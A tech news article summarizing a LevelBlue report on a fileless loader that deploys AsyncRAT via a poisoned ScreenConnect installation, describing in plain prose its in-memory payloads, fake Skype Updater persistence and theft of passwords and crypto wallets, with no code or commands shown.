Fileless malware: old tricks for new attacks

The first “fileless worm” on the internet plagued organizations in 2001. A new report from LevelBlue shines a spotlight on AsyncRAT, which is also anything but new and continues to cause problems without carrying any files.

LevelBlue’s SOC team has detected a fileless loader used to deploy AsyncRAT. AsyncRAT is one of the most popular examples of Malware-as-a-Service; attacks mainly target critical infrastructure in the US. It is a tool for remotely controlling devices. It disguises itself as a trusted utility and therefore regularly remains undetected. LevelBlue’s most interesting discovery is not about the malware itself, but the way it ends up on devices.

ScreenConnect

The legitimate RMM tool ScreenConnect was abused by the attackers in the incident highlighted by LevelBlue. The installation included the means to deploy AsyncRAT, but without separate files. After installing the poisoned version of ScreenConnect, a VBScript and PowerShell loader followed, which secretly ran components via external URLs. Only VBS files appeared on the disk, but the problematic consequences of this malware remained in RAM.

The payloads were loaded into the endpoint’s memory via malicious URLs. In other words, there was no file present to betray the attack. AsyncRAT’s targets were passwords and crypto wallets, so the attacker had a financial motive for the compromise.

Whenever a restart was needed for the malware, it was done via the malicious “Skype Updater,” an app that is no longer used by Microsoft. Nevertheless, this background behavior is unlikely to be a sign that something is wrong for unsuspecting users.

Encrypted

The secret reinstallation, the key to the long-term existence of this version of AsyncRAT, takes place via an encrypted string. During runtime, this is decrypted and the malware is told to reinstall itself if necessary. The normally hidden %AppData% within Windows serves as a safe hiding place.

In its report, LevelBlue manages to dissect every component of the loader and AsyncRAT. This also reveals how the attacker can be blocked. Apart from the now familiar C2 domains, behavioral patterns of the malicious ScreenConnect implementation are also known, enabling security companies to improve detection.

Top story

IGEL benefits from seismic VMware and Windows 10 shifts

No matter how strong IT security is, cyberattacks are almost impossible to prevent. IGEL argues that endpoint...

Erik van Klinken August 22, 2025

Expert Talks

Tech calendar

Fileless malware: old tricks for new attacks

ScreenConnect

Encrypted

Stay tuned, subscribe!

Splunk reshapes AgenticOps with “supercharged” observability

Microsoft purchases 50 hectares for Dutch data center expansion

ASML becomes largest shareholder in Mistral AI after 1.3B euro deal

Evolution of private 5G and Wi-Fi: is convergence on the horizon?

The impact of OpsRamp on HPE and its integration into the stack

HPE takes a full-stack approach to the AI Factory

The evolution of HPE from a hardware to a software company

The AI productivity mirage: why leaders are aiming at the wrong target

Meeting future workload demands: the case for emerging memory technologies

How AI and automation are redefining ROI in the enterprise

Enhancing video encoding: The AV1 support in the new ARTPEC-9 System-on-Chip

VeeamON Tour 2025

IT Arena

National 6G Conference

Innovation Week 2025

Luxembourg Venture Days

Appdevcon

Experience Synology’s latest enterprise backup solution

How to choose the right Enterprise Linux platform?

Enhance your data protection strategy for 2025

Strengthen your cybersecurity with DNS best practices